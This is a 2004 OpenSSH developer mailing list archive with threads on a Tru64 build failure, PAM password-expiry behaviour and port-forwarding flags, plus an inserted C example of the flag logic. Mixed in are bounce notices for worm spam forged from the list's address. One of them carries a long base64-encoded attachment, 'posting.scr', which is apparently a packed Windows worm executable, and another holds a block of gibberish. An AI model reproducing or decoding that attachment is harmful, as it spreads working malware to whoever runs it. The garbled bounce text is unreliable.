seems to have built without errors. I configure as follows:

CC=cc CFLAGS=-O LDFLAGS=-non_shared ./configure --prefix=/opt/ssh
--with-prngd-socket =/var/run/egd-pool --with-ssl-dir=/opt/ssh
--with-zlib=/opt/zlib

cc -o sshd sshd.o auth-rhosts.o auth-passwd.o auth-rsa.o auth-rh-rsa.o
sshpty.o sshlogin.o servconf.o serverloop.o uidswap.o auth.o auth1.o
auth2.o auth-options.o session.o auth-chall.o auth2-chall.o groupaccess.o
auth-skey.o auth-bsdauth.o auth2-hostbased.o auth2-kbdint.o auth2-none.o
auth2-passwd.o auth2-pubkey.o monitor_mm.o monitor.o monitor_wrap.o
monitor_fdpass.o kexdhs.o kexgexs.o auth-krb5.o auth2-gss.o gss-serv.o
gss-serv-krb5.o loginrec.o auth-pam.o auth-shadow.o auth-sia.o md5crypt.o
-L. -Lopenbsd-compat/ -L/opt/ssh/lib -L/opt/zlib/lib -non_shared -lssh
-lopenbsd-compat -lcrypto -lrt -lz -lsecurity -ldb -lm -laud
ld:
Error: Undefined:
xcrypt
shadow_pw
*** Exit 1
Stop.


Any help debugging this would be appreciated.

Thank you,

N

From mouring at etoh.eviladmin.org Sun Mar 28 05:34:00 2004
From: mouring at etoh.eviladmin.org (Ben Lindstrom)
Date: Sat, 27 Mar 2004 13:34:00 -0600 (CST)
Subject: Problems Compiling sshd - OpenSSH 3.8p1 on Tru64 UNIX V4.0F PK#7 (OSF)
In-Reply-To: <20040327141048.A637@spiff.hr.att.com>
Message-ID:

We are aware of this and it has been solved.

http://bugzilla.mindrot.org/show_bug.cgi?id=802

When 3.8.1p1 is released it will include this fix.

- Ben

On Sat, 27 Mar 2004, Narendra Raavi wrote:

>
> I am trying to compile sshd 3.8p1 on Tru64 UNIX V4.0F Patch Level 7.
> Previously I've compiled the entire 3.6.1p2 distribution with no problems.
> The problem seems to occur when linking sshd. The linker is unable to find
> xcrypt and shadow_pw functions (openbsd-compat/*.c). The libopenbsd-compat
> seems to have built without errors. I configure as follows:
>
> CC=cc CFLAGS=-O LDFLAGS=-non_shared ./configure --prefix=/opt/ssh
> --with-prngd-socket =/var/run/egd-pool --with-ssl-dir=/opt/ssh
> --with-zlib=/opt/zlib
>
> cc -o sshd sshd.o auth-rhosts.o auth-passwd.o auth-rsa.o auth-rh-rsa.o
> sshpty.o sshlogin.o servconf.o serverloop.o uidswap.o auth.o auth1.o
> auth2.o auth-options.o session.o auth-chall.o auth2-chall.o groupaccess.o
> auth-skey.o auth-bsdauth.o auth2-hostbased.o auth2-kbdint.o auth2-none.o
> auth2-passwd.o auth2-pubkey.o monitor_mm.o monitor.o monitor_wrap.o
> monitor_fdpass.o kexdhs.o kexgexs.o auth-krb5.o auth2-gss.o gss-serv.o
> gss-serv-krb5.o loginrec.o auth-pam.o auth-shadow.o auth-sia.o md5crypt.o
> -L. -Lopenbsd-compat/ -L/opt/ssh/lib -L/opt/zlib/lib -non_shared -lssh
> -lopenbsd-compat -lcrypto -lrt -lz -lsecurity -ldb -lm -laud
> ld:
> Error: Undefined:
> xcrypt
> shadow_pw
> *** Exit 1
> Stop.
>
>
> Any help debugging this would be appreciated.
>
> Thank you,
>
> N
>
>
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> http://www.mindrot.org/mailman/listinfo/openssh-unix-dev
>

From rws at xx.lcs.mit.edu Sat Mar 27 11:52:46 2004
From: rws at xx.lcs.mit.edu (rws at xx.lcs.mit.edu)
Date: Fri, 26 Mar 2004 21:52:46 -0300
Subject: Spamed?
Message-ID: <20040327221310.0553327C188@shitei.mindrot.org>

Are you a spammer? (I found your email on a spammer website!?!)

From kumaresh_ind at gmx.net Sun Mar 28 16:39:13 2004
From: kumaresh_ind at gmx.net (Kumaresh)
Date: Sun, 28 Mar 2004 12:09:13 +0530
Subject: Challenge Response authentication
Message-ID: <024c01c4148f$6842e5b0$230110ac@kurco>

Hi All,

Is there a difference in 3.6 and 3.7 implementation of ChallengeResponse
authentication?

Also, what is the impact of setting UsePAM yes and no with respect to this
authentication method and expiry passwords.

Thanks,
Kumaresh

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004

From dtucker at zip.com.au Sun Mar 28 20:33:11 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Sun, 28 Mar 2004 20:33:11 +1000
Subject: Challenge Response authentication
In-Reply-To: <024c01c4148f$6842e5b0$230110ac@kurco>
References: <024c01c4148f$6842e5b0$230110ac@kurco>
Message-ID: <4066A9E7.3020205@zip.com.au>

Kumaresh wrote:
> Is there a difference in 3.6 and 3.7 implementation of ChallengeResponse
> authentication?

Challenge-response hasn't changed much, but the PAM challenge-response
module was completely replaced between 3.6.1p2 and 3.7p1.

> Also, what is the impact of setting UsePAM yes and no with respect to this
> authentication method and expiry passwords.

For 3.8p1 and up, when a user's password is expired and UsePAM=yes,

if Protocol == 2 and keyboard-interactive auth
    force change via keyboard-interactive
else if PrivSep == no
    force change via pam_chauthtok() at start of session
else
    force change via /usr/bin/passwd in session

With PAM enabled, password expiry is checked for *all* authentication
types (assuming PAM is configured to do so) since that test is done by
pam_acct_mgmt(), which needs to be checked for all auth types.

When UsePAM=no, password expiry is checked *only* for password
authentication, and password change is always done via /usr/bin/passwd.

Note that there is a bug when UsePAM=yes, the user's password is expired
and challenge-response is not used (see bugzilla #808).

(This is from memory, hopefully I got all the details right :-)

-- 
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From keiyamashita at super-r.net Sun Mar 28 22:25:47 2004
From: keiyamashita at super-r.net (Yamashita Kei)
Date: Sun, 28 Mar 2004 21:25:47 +0900
Subject: (no subject)
Message-ID: <000701c414bf$ccf4c980$dc04a8c0@yamashitb2xgc0>

From MAILER-DAEMON at amaya.be.ubizen.com Mon Mar 29 18:50:38 2004
From: MAILER-DAEMON at amaya.be.ubizen.com (MAILER-DAEMON at amaya.be.ubizen.com)
Date: 29 Mar 2004 08:50:38 -0000
Subject: failure notice
Message-ID: <200403290850.i2T8ouEp017036@mail.be.ubizen.com>

Hi. This is the qmail-send program at amaya.be.ubizen.com.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

:
Sorry, no mailbox here by that name. (#5.1.1)

--- Below this line is a copy of the message.

Return-Path:
Received: (qmail 10449 invoked from network); 29 Mar 2004 08:50:38 -0000
Received: from unknown (HELO mail.be.ubizen.com) (212.113.70.10)
  by amaya.be.ubizen.com with SMTP; 29 Mar 2004 08:50:31 -0000
Received: (from local)
  by mail.be.ubizen.com id i2T8oMR4016964
  for ; Mon, 29 Mar 2004 10:50:22 +0200
Message-Id: <200403290850.i2T8oMR4016964 at mail.be.ubizen.com>
Received: from UNKNOWN(195.6.68.65), claiming to be "ubizen.com"
  via SMTP by batty.netvision.be, id smtpd16901aaa; Mon Mar 29 08:49:48 2004
From: openssh-unix-dev at mindrot.org
To: nicolas.appert at ubizen.com
Subject: Status (nicolas.appert at ubizen.com)
Date: Mon, 29 Mar 2004 10:48:55 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 1
X-MSMail-Priority: High
X-Sanitizer: In/BE
X-Spam-Level: ***********
X-Spam-Checker-Version: SpamAssassin 2.60 (1.212-2003-09-23-exp) on
  amaya.be.ubizen.com
X-Spam-Flag: YES
X-Spam-Report:
  * 1.3 X_PRIORITY_HIGH Sent with 'X-Priority' set to high
  * 0.2 NO_REAL_NAME From: does not include a real name
  * 0.5 X_MSMAIL_PRIORITY_HIGH Sent with 'X-Msmail-Priority' set to high
  * 0.1 RM_sl_LeadChar Subject contains word which begins with non-word character
  * 0.1 LG_4C_2V_3C BODY: Gibberish found?
  * 5.4 BAYES_99 BODY: Bayesian spam probability is 99 to 100%
  * [score: 0.9929]
  * 0.7 MSGID_FROM_MTA_HEADER Message-Id was added by a relay
  * 1.6 MISSING_MIMEOLE Message has X-MSMail-Priority, but no X-MimeOLE
  * 1.2 PRIORITY_NO_NAME Message has priority setting, but no X-Mailer
  * 0.5 MIME_BOUND_NEXTPART Spam tool pattern in MIME boundary
  * 0.1 CLICK_BELOW Asks you to click below
X-Spam-Status: Yes, hits=11.6 required=5.0 tests=BAYES_99,CLICK_BELOW,
  LG_4C_2V_3C,MIME_BOUND_NEXTPART,MISSING_MIMEOLE,MSGID_FROM_MTA_HEADER,
  NO_REAL_NAME,PRIORITY_NO_NAME,RM_sl_LeadChar,X_MSMAIL_PRIORITY_HIGH,
  X_PRIORITY_HIGH autolearn=no version=2.60

This is a multi-part message in MIME format.

------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit

Mail Transaction Failed - This mail couldn't be converted

------------- failed message -------------
k$Ky1oo;_?X?N-ABKoN&N62CQlbW?s6Ctm~gh9|.abp
XFuTl3IJ?))(tRJE)VAPrQ?vXlH#t4v7FuNoklS>,YlR-u_o
7vm9P0e1?:no_b&uilfH'2RP9n:,,qB+oNmV4woU?nfW(
%25q|i'X|+olvLdw5S)P5K;ho>qCJSaR(tN'TxTaW$U6N#f
*K|7

Received message has been attached.

------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: text/plain; charset="iso-8859-1"; name="DEFANGED-8710.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline; name="DEFANGED-8710.txt"

This message has been modified for security reasons.

The original attachment has been saved on the mail server,
with the following file name: att-mail29638.pif-4067e359.UY

The removed attachment's original name was: mail29638.pif

Contacting the sender of the email you received to warn him/her is highly discouraged.
For more information about why the attachment was removed, please click here
http://sil.be.ubizen.com/contscan/ .

------=_NextPart_000_0016----=_NextPart_000_0016--

From f_mohr at yahoo.de Mon Mar 29 21:46:59 2004
From: f_mohr at yahoo.de (Frank Mohr)
Date: Mon, 29 Mar 2004 13:46:59 +0200
Subject: Flags in pam_password_change_required() (auth-pam.c)
Message-ID: <40680CB3.7280AA50@yahoo.de>

Hi

I just "stumbled" over the flags settings in
pam_password_change_required().
As far as I looked over the OpenSSH code, setting/resetting the 2nd bit
in those flags from auth-options.c would only make sense if the flags
are checked to be 0/1 in the remaining OpenSSH code.

Frank

From dtucker at zip.com.au Mon Mar 29 22:24:07 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Mon, 29 Mar 2004 22:24:07 +1000
Subject: Flags in pam_password_change_required() (auth-pam.c)
In-Reply-To: <40680CB3.7280AA50@yahoo.de>
References: <40680CB3.7280AA50@yahoo.de>
Message-ID: <40681567.3080503@zip.com.au>

Frank Mohr wrote:
> I just "stumbled" over the flags settings in
> pam_password_change_required().
> As far as I looked over the OpenSSH code, setting/resetting the 2nd bit
> in those flags from auth-options.c would only make sense if the flags
> are checked to be 0/1 in the remaining OpenSSH code.

Think: bit 1 = disabled by server config, bit 2 = disabled because
password is expired and not yet changed.

Bit 2 gets cleared if the user successfully changes the password, but if
the server config denies it then the forwarding request will still be
denied.

The code that checks those flags looks like:

    if (!no_port_forwarding_flag)
        [...]

-- 
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From postmaster at estacio.br Mon Mar 29 22:42:51 2004
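The two-bit scheme from Darren Tucker's reply above, as an added example that is not OpenSSH source and not part of the original thread. It contrasts the bitmask with a single shared 0/1 value, which would re-allow forwarding that the server configuration had denied; all names except no_port_forwarding_flag are hypothetical.

```c
#include <stdio.h>

/*
 * Added example, not OpenSSH source. Bit meanings follow the reply above;
 * every name except no_port_forwarding_flag is hypothetical.
 */
#define DENY_BY_CONFIG 1 /* bit 1: disabled by server config */
#define DENY_BY_EXPIRY 2 /* bit 2: password expired and not yet changed */

struct session_flags {
	int no_port_forwarding_flag;
};

/* Server configuration denies port forwarding for this session. */
static void deny_by_config(struct session_flags *s)
{
	s->no_port_forwarding_flag |= DENY_BY_CONFIG;
}

/* Bitmask version: touches only bit 2, so bit 1 survives a password change. */
static void password_change_required(struct session_flags *s, int reqd)
{
	if (reqd)
		s->no_port_forwarding_flag |= DENY_BY_EXPIRY;
	else
		s->no_port_forwarding_flag &= ~DENY_BY_EXPIRY;
}

/* Naive version: one 0/1 value shared by both reasons for denial. */
static void naive_password_change_required(struct session_flags *s, int reqd)
{
	s->no_port_forwarding_flag = reqd ? 1 : 0;
}

/* Same shape as the check quoted above: any set bit denies the request. */
static int port_forwarding_allowed(const struct session_flags *s)
{
	return !s->no_port_forwarding_flag;
}

/*
 * Runs one login: optional config denial, expired password, successful
 * change. Returns 1 if forwarding is allowed afterwards, 0 if denied,
 * -1 if it was allowed while the password was still expired.
 */
static int forwarding_after_change(int config_denies, int use_bitmask)
{
	struct session_flags s = { 0 };
	void (*change_required)(struct session_flags *, int) =
	    use_bitmask ? password_change_required
	                : naive_password_change_required;

	if (config_denies)
		deny_by_config(&s);
	change_required(&s, 1);          /* expiry detected at login */
	if (port_forwarding_allowed(&s))
		return -1;
	change_required(&s, 0);          /* user changed the password */
	return port_forwarding_allowed(&s);
}

int main(void)
{
	int config_denies, use_bitmask;

	for (use_bitmask = 1; use_bitmask >= 0; use_bitmask--)
		for (config_denies = 0; config_denies <= 1; config_denies++)
			printf("%-7s config_denies=%d -> forwarding %s\n",
			    use_bitmask ? "bitmask" : "naive", config_denies,
			    forwarding_after_change(config_denies, use_bitmask)
			    == 1 ? "allowed" : "denied");
	return 0;
}
```

With the bitmask, a session whose configuration denies forwarding stays denied after the password change; with the shared 0/1 value the same session ends up allowed.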
From: postmaster at estacio.br (postmaster at estacio.br)
Date: Mon, 29 Mar 2004 09:42:51 -0300 (BRT)
Subject: Message refused: file or subject not permitted
Message-ID: <20040329124251.2042D38C7D@mail1.estacio.br>

A file type or subject that is not permitted was found in this message.

From: openssh-unix-dev at mindrot.org
To: filipo at estacio.br
File(s): message.scr
Matching filename: *.scr

From MAILER-DAEMON at destro.sparkart.net Tue Mar 30 00:47:40 2004
From: MAILER-DAEMON at destro.sparkart.net (MAILER-DAEMON at destro.sparkart.net)
Date: 29 Mar 2004 06:47:40 -0800
Subject: failure notice
Message-ID: <20040329144745.F0E4227C187@shitei.mindrot.org>

Hi. This is the qmail-send program at destro.sparkart.net.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

:
Sorry, no mailbox here by that name. vpopmail (#5.1.1)

--- Below this line is a copy of the message.

Return-Path:
Received: (qmail 24740 invoked from network); 29 Mar 2004 06:47:39 -0800
Received: from unknown (HELO linkinpark.com) (195.205.206.254)
  by destro.sparkart.net with SMTP; 29 Mar 2004 06:47:39 -0800
From: openssh-unix-dev at mindrot.org
To: security at linkinpark.com
Subject: something for you
Date: Mon, 29 Mar 2004 16:47:37 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="21665162"

--21665162
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

is that your name?

--21665162
Content-Type: application/octet-stream; name="posting.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="posting.scr"
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 dfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYnY4tmNvgBwAQCLBwnAdEWLXwSNhDBknQEA AfNQg8cI/5bwnQEAlYoHRwjAdNyJ+XkHD7cHR1BHuVdI8q5V/5b0nQEACcB0B4kDg8ME69j/ lvidAQBh6beo/v8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAgADAAAAIAAAgA4AAABgAACAAAAAAAAAAAAAAAAAAAABAAEAAAA4AACAAAAAAAAA AAAAAAAAAAABAAcEAABQAAAApKABAKgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQBlAAAA eAAAgAAAAAAAAAAAAAAAAAAAAQAHBAAAkAAAAFCtAQAUAAAAAAAAAAAAAACgcAEAKAAAACAA AABAAAAAAQAYAAAAAACADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgMDAwMDAwMDAwMDAwMDAwMDAwMDA 